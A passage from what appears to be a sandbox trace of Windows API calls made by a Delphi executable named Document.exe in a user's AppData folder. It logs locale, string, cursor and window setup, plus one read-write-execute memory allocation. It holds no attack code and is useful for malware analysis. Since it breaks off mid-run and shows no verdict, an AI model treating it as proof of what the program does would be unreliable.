lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0165.619] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0165.620] GetThreadLocale () returned 0x409 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0165.620] GetThreadLocale () returned 0x409 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0165.620] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0165.620] GetThreadLocale () returned 0x409 [0165.621] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0165.621] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0165.621] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0165.621] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0165.621] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.621] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.621] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0165.621] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0165.621] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76720000 [0165.621] GetProcAddress (hModule=0x76720000, lpProcName="VariantChangeTypeEx") returned 0x76724c28 [0165.621] GetProcAddress (hModule=0x76720000, lpProcName="VarNeg") returned 0x7679c802 [0165.621] GetProcAddress (hModule=0x76720000, lpProcName="VarNot") returned 0x7679ec66 [0165.621] GetProcAddress (hModule=0x76720000, lpProcName="VarAdd") returned 0x76745934 [0165.621] GetProcAddress (hModule=0x76720000, lpProcName="VarSub") returned 0x7679d332 [0165.621] GetProcAddress (hModule=0x76720000, lpProcName="VarMul") returned 0x7679dbd4 [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarDiv") returned 0x7679e405 [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarIdiv") returned 0x7679f00a [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarMod") returned 0x7679f15e [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarAnd") returned 0x76745a98 [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarOr") returned 0x7679ecfa [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarXor") returned 0x7679ee2e [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarCmp") returned 0x7673b0dc [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarI4FromStr") returned 0x76736fab [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarR4FromStr") returned 0x767401a0 [0165.622] GetProcAddress (hModule=0x76720000, lpProcName="VarR8FromStr") returned 0x7673699e [0165.623] GetProcAddress (hModule=0x76720000, lpProcName="VarDateFromStr") returned 0x76746ba7 [0165.623] GetProcAddress (hModule=0x76720000, lpProcName="VarCyFromStr") returned 0x76766c12 [0165.623] GetProcAddress (hModule=0x76720000, lpProcName="VarBoolFromStr") returned 0x7673dbd1 [0165.623] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromCy") returned 0x76747fdc [0165.623] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromDate") returned 0x76737a2a [0165.623] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromBool") returned 0x76740355 [0165.624] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8 [0165.624] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xac [0165.624] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0165.625] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77820000 [0165.625] GetDC (hWnd=0x0) returned 0x260107b3 [0165.625] GetDeviceCaps (hdc=0x260107b3, index=90) returned 96 [0165.625] ReleaseDC (hWnd=0x0, hDC=0x260107b3) returned 1 [0165.625] GetDC (hWnd=0x0) returned 0x260107b3 [0165.625] GetDeviceCaps (hdc=0x260107b3, index=104) returned 0 [0165.625] ReleaseDC (hWnd=0x0, hDC=0x260107b3) returned 1 [0165.625] CreatePalette (plpal=0x18fb30) returned 0x50809b0 [0165.625] GetStockObject (i=7) returned 0x1b00017 [0165.625] GetStockObject (i=5) returned 0x1900015 [0165.625] GetStockObject (i=13) returned 0x18a002e [0165.626] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0165.626] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff34, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0165.650] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0165.651] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e7 [0165.651] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f8 [0165.651] GetCurrentThreadId () returned 0x600 [0165.651] GlobalAddAtomA (lpString="WndProcPtr0040000000000600") returned 0xc125 [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xfef3, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xfef2, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xfef1, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0165.653] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0165.654] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0165.655] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1e8 [0165.655] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1e9 [0165.655] GetVersion () returned 0x1db10106 [0165.655] GetCurrentProcessId () returned 0x81c [0165.655] GlobalAddAtomA (lpString="Delphi0000081C") returned 0xc123 [0165.655] GetCurrentThreadId () returned 0x600 [0165.655] GlobalAddAtomA (lpString="ControlOfs0040000000000600") returned 0xc126 [0165.655] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000600") returned 0xc1eb [0165.655] GetProcAddress (hModule=0x77820000, lpProcName="GetMonitorInfoA") returned 0x77844413 [0165.656] GetProcAddress (hModule=0x77820000, lpProcName="GetSystemMetrics") returned 0x77837d2f [0165.656] GetSystemMetrics (nIndex=19) returned 1 [0165.751] GetSystemMetrics (nIndex=75) returned 1 [0165.751] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a1320, fWinIni=0x0 | out: pvParam=0x2a1320) returned 1 [0165.752] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0165.752] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0165.752] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x50285 [0165.752] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0165.752] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0165.752] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0165.752] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x13023b [0165.752] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x50231 [0165.753] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0xd0113 [0165.753] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0xf00af [0165.753] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x80065 [0165.753] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0xa02b3 [0165.753] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0165.753] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0165.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0165.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0165.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0165.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0165.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0165.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0165.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0165.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0165.754] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0165.754] GetDC (hWnd=0x0) returned 0x260107b3 [0165.754] GetDeviceCaps (hdc=0x260107b3, index=90) returned 96 [0165.754] ReleaseDC (hWnd=0x0, hDC=0x260107b3) returned 1 [0165.754] GetProcAddress (hModule=0x77820000, lpProcName="EnumDisplayMonitors") returned 0x7784451a [0165.754] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4564bc, dwData=0x2a156c) returned 1 [0165.754] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0165.755] CreateFontIndirectA (lplf=0x18fe97) returned 0xf0a09b6 [0165.755] GetObjectA (in: h=0xf0a09b6, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0165.755] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0165.755] CreateFontIndirectA (lplf=0x18fe1f) returned 0x170a09b2 [0165.755] GetObjectA (in: h=0x170a09b2, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0165.755] CreateFontIndirectA (lplf=0x18fde3) returned 0x280a0a1f [0165.755] GetObjectA (in: h=0x280a0a1f, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0165.755] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x602b5 [0165.758] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0165.759] OemToCharA (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 1 [0165.759] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0165.759] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0165.759] RegisterClassA (lpWndClass=0x45fe1c) returned 0xc5c1c0 [0165.759] GetSystemMetrics (nIndex=0) returned 1440 [0165.759] GetSystemMetrics (nIndex=1) returned 900 [0165.759] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="Document", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x20196 [0165.765] SetWindowLongA (hWnd=0x20196, nIndex=-4, dwNewLong=2166767) returned 4219680 [0165.765] SendMessageA (hWnd=0x20196, Msg=0x80, wParam=0x1, lParam=0x602b5) returned 0x0 [0165.765] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x80, wParam=0x1, lParam=0x602b5) returned 0x0 [0165.825] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x40243 [0165.826] SetClassLongA (hWnd=0x20196, nIndex=-14, dwNewLong=393909) returned 0x0 [0165.827] GetSystemMenu (hWnd=0x20196, bRevert=0) returned 0x60291 [0165.828] DeleteMenu (hMenu=0x60291, uPosition=0xf030, uFlags=0x0) returned 1 [0165.828] DeleteMenu (hMenu=0x60291, uPosition=0xf000, uFlags=0x0) returned 1 [0165.828] DeleteMenu (hMenu=0x60291, uPosition=0xf010, uFlags=0x0) returned 1 [0165.828] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0165.876] GetModuleHandleA (lpModuleName="USER32") returned 0x77820000 [0165.877] GetProcAddress (hModule=0x77820000, lpProcName="AnimateWindow") returned 0x7784b531 [0165.877] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75460000 [0165.877] GetProcAddress (hModule=0x75460000, lpProcName="InitializeFlatSB") returned 0x7549266f [0165.877] GetProcAddress (hModule=0x75460000, lpProcName="UninitializeFlatSB") returned 0x75492542 [0165.877] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollProp") returned 0x75491d29 [0165.878] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollProp") returned 0x7549238d [0165.878] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_EnableScrollBar") returned 0x754920c9 [0165.878] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_ShowScrollBar") returned 0x75491fdb [0165.878] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollRange") returned 0x75491e8d [0165.878] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollInfo") returned 0x75491f0f [0165.878] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollPos") returned 0x75491ccd [0165.878] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollPos") returned 0x7549216d [0165.878] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollInfo") returned 0x754922be [0165.878] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollRange") returned 0x754921e2 [0165.878] GetModuleHandleA (lpModuleName="User32.dll") returned 0x77820000 [0165.878] GetProcAddress (hModule=0x77820000, lpProcName="SetLayeredWindowAttributes") returned 0x7785ec88 [0165.878] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0165.878] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe2c, nSize=0xff | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] GetLastError () returned 0x6 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] 